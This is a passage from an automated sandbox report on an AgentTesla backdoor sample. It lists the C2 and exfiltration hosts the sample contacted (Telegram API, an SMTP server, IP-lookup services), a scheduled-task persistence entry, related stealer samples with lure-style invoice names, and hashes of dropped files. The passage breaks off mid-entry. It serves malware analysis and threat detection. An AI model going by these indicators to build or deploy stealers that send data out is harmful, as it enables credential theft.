https://reallyfreegeoip.org/xml/	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002890000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
208.91.199.223	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1539353
Start date and time:	2024-10-22 15:41:25 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/15@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 299 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, PID 3220 because it is empty
Execution Graph export aborted for target xRAvleeiuDbJ.exe, PID 2488 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Simulations

Behavior and APIs

Time	Type	Description
09:42:16	API Interceptor	8343498x Sleep call for process: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe modified
09:42:18	API Interceptor	32x Sleep call for process: powershell.exe modified
09:42:21	API Interceptor	6283330x Sleep call for process: xRAvleeiuDbJ.exe modified
15:42:20	Task Scheduler	Run new task: xRAvleeiuDbJ path: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Swift Detail 103.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	FACTURA-ALBARANES.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	New Purchase_Order_110511.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	7vbu8ZW8lFI8mn5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	TicariXHesapXXzetiniz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	REVISED PROFORMA INVOICE STVC007934196.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	MT103-539 PAYMENT (1).docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	RFQ 1307.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.96.3	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.timizoasisey.shop/3p0l/
	BL.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	w49A5FG3yg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	733812cm.n9shteam.in/DefaultWordpress.php
	9XHFe6y4Dj.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	733812cm.n9shteam.in/DefaultWordpress.php
	SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	t1zTzS9a3r.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
	aQdB62N7SB.elf	Get hash	malicious	Shikitega, Xmrig	Browse	main.dsn.ovh/dns/lovely
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/DyuQ5y15/download
	zygWTMeQC2.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	138231cm.n9shteam.in/CpuApiprotectTemp.php
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
208.91.199.223	Proforma Invoice_21-1541 And Packing List.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO.exe	Get hash	malicious	AgentTesla	Browse
	Request for Quotation Plug Valve.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.RATX-gen.3768.11045.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	UPDATED FLOOR PLAN_3D.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	New Order PO#86637.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	z47TTSWIFTCOPY.scr.exe	Get hash	malicious	AgentTesla	Browse
	EXmRyGiPUc.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	FACTURA-ALBARANES.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	New Purchase_Order_110511.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	7vbu8ZW8lFI8mn5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z547GEViTFyfCZdLZP.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	TicariXHesapXXzetiniz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	REVISED PROFORMA INVOICE STVC007934196.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	MT103-539 PAYMENT (1).docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PaymentXConfirmationXcopy.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Musterino_94372478_Ekno_21_20241024761_ekstre.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
checkip.dyndns.com	FACTURA-ALBARANES.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	New Purchase_Order_110511.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	7vbu8ZW8lFI8mn5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	001_215_EA2047939_202410210815.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	z547GEViTFyfCZdLZP.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	TicariXHesapXXzetiniz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	REVISED PROFORMA INVOICE STVC007934196.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	MT103-539 PAYMENT (1).docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	PaymentXConfirmationXcopy.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
us2.smtp.mailhostbox.com	Proforma Invoice_21-1541 And Packing List.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Tax Invoice 103505.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.224
	PO.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	Purchase_Order.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	Scanned.pdf.pif.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	Request for Quotation Plug Valve.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Cotizaci#U00f3n P13000996 pdf.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	Payment Advice - Advice Ref pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.224
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
api.telegram.org	FACTURA-ALBARANES.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	New Purchase_Order_110511.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	7vbu8ZW8lFI8mn5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TicariXHesapXXzetiniz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	REVISED PROFORMA INVOICE STVC007934196.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	MT103-539 PAYMENT (1).docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ 1307.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FACTURA RAGOZA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Swift Detail 103.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FACTURA-ALBARANES.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	New Purchase_Order_110511.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	7vbu8ZW8lFI8mn5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TicariXHesapXXzetiniz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	REVISED PROFORMA INVOICE STVC007934196.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	MT103-539 PAYMENT (1).docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ 1307.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	Swift Detail 103.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://link.edgepilot.com/s/a87a8c67/R8ziiM5L9EqrFhZqAjyPWg?u=https://debbydollar.com/	Get hash	malicious	Unknown	Browse	104.18.11.207
	FACTURA-ALBARANES.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	FZCO - PO#12345.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	New Purchase_Order_110511.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.53.8
	7vbu8ZW8lFI8mn5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Technical Datasheet and Specification_PDF.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Message_2533705.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	Ref#150689.vbe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
PUBLIC-DOMAIN-REGISTRYUS	FZCO - PO#12345.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	TT Swift copy1.exe	Get hash	malicious	FormBook	Browse	119.18.54.27
	PO-000041522.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	MA2402201136.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	Shipment.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	https://newsletter.yuppiechef.com/m/b22fbc43-5c9b-4512-8142-73d63b4fca71/ed8a7a2a-af07-4e9a-b6ac-66041aa91f60/0?url=https://deevapayon.com/wp-admin/includes/redirect#bWFyay5sZXdpc0Bsb2dpY2FsaXMuY29t?	Get hash	malicious	HTMLPhisher	Browse	119.18.55.21
	r0000000NT_PDF.exe	Get hash	malicious	FormBook	Browse	119.18.54.27
	purchase order.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	Proforma Invoice_21-1541 And Packing List.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	https://pg9t70xx.r.us-east-1.awstrack.me/L0/https:%2F%2Fjustworks.app.link%2F%3F%24deeplink_path=%2Falerts%2Ftime_off_requests%2F13a6b7f0-b2ae-4165-87b0-da6673653a54%26%24fallback_url=http%253A%252F%252Fwww.google.com.sg%252Furl%253Fsa%253Dt%2526esrc%253DYUM58NDu%2526source%253D%2526rct%253D304J%2526%2526cd%253D256Du%2526uact%2526url%253Damp%252Fs%252F%2573%2579%2573%2562%2569%257A%257A%252E%2569%256E%252F%252E%2564%2572%2565%256E%2574%256F%2570%252F%23dm1hbnRocmlwcmFnYWRhQG1vbnRyb3NlLWVudi5jb20=/1/0100019291d15735-3d3bd509-ef84-4bb4-a854-1b8c9d0b05f9-000000/-gk1ZN3uoUfApTKZkXOmptm9MGY=396	Get hash	malicious	Unknown	Browse	103.21.58.15
UTMEMUS	FACTURA-ALBARANES.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	z547GEViTFyfCZdLZP.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	TicariXHesapXXzetiniz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	MT103-539 PAYMENT (1).docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PaymentXConfirmationXcopy.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Musterino_94372478_Ekno_21_20241024761_ekstre.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	arm7.elf	Get hash	malicious	Unknown	Browse	132.224.247.79
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Swift Detail 103.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	FACTURA-ALBARANES.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	New Purchase_Order_110511.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	7vbu8ZW8lFI8mn5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z547GEViTFyfCZdLZP.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	TicariXHesapXXzetiniz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	REVISED PROFORMA INVOICE STVC007934196.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Musterino_94372478_Ekno_21_20241024761_ekstre.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	SUAlTWPjKQ.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Swift Detail 103.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6 654398.vbs	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.220
	FACTURA-ALBARANES.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Massageapparater.vbs	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.220
	FZCO - PO#12345.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	New Purchase_Order_110511.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	7vbu8ZW8lFI8mn5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Ref#150689.vbe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	MEC20241022001.bat	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	SecuriteInfo.com.Win32.Malware-gen.5541.4493.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLV1qE4jE4K5E4KlKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:Mp1qHjHK5HKlYHKh3oPtHo6hAHKze0HJ
MD5:	B3F9683FD57A94D3C3F5E1AEC259CEAD
SHA1:	EC2310112CBA894207F624FCC35E9C0FCE80EE2F
SHA-256:	97FC8E1E4A9D08C91DEC78055942F0562C6EEC2480F5DDA2E7A9E9358AC86F94
SHA-512:	37407216C4E44C3FFF758637D4661AA9CCAC1C34C9AFEDEAF4ACEFEE8F527921046004F90CD2AE304E1A0EAFB636AC7F0DDBCED579C6642E7C32746491E854F2
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xRAvleeiuDbJ.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLV1qE4jE4K5E4KlKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:Mp1qHjHK5HKlYHKh3oPtHo6hAHKze0HJ
MD5:	B3F9683FD57A94D3C3F5E1AEC259CEAD
SHA1:	EC2310112CBA894207F624FCC35E9C0FCE80EE2F
SHA-256:	97FC8E1E4A9D08C91DEC78055942F0562C6EEC2480F5DDA2E7A9E9358AC86F94
SHA-512:	37407216C4E44C3FFF758637D4661AA9CCAC1C34C9AFEDEAF4ACEFEE8F527921046004F90CD2AE304E1A0EAFB636AC7F0DDBCED579C6642E7C32746491E854F2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379460230152629
Encrypted:	false
SSDEEP:	48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
MD5:	4DC84D28CF28EAE82806A5390E5721C8
SHA1:	66B6385EB104A782AD3737F2C302DEC0231ADEA2
SHA-256:	1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
SHA-512:	E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_321b0kgr.jip.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mjz2djq.ijo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpdhrbur.m1r.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_deft0jmd.vz2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fawfcoug.1hk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
